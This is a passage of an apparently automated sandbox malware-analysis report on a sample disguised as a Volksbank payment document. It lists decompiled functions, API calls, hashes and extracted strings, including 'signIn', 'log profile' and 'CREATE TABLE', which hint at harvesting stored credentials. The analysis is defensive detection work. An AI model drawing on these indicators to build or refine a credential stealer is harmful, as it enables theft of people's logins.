                                                                                                                                                                                                                                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                                          Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                                          • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                                          • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                                          • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                                                                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                                          Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405E33
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                                                                          • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                                                                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                                          Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2047574939-0
                                                                                                                                                                                                                                          • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                                                                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                                          Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4218492932-0
                                                                                                                                                                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                                          Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                                          Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                                          • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                                          Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4281309102-0
                                                                                                                                                                                                                                          • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                                                                                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                                                          Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _snwprintfwcscat
                                                                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                                          • API String ID: 384018552-4153097237
                                                                                                                                                                                                                                          • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                                                                                                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                                                          Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                                          • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                                                                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                                                          Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                                          • String ID: 6$\
                                                                                                                                                                                                                                          • API String ID: 404372293-1284684873
                                                                                                                                                                                                                                          • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                                                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                                                          Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                                                                                          • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                                                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                                                          Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                                                                                          • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                                          • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                                                          Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                                          • API String ID: 3473751417-2880344631
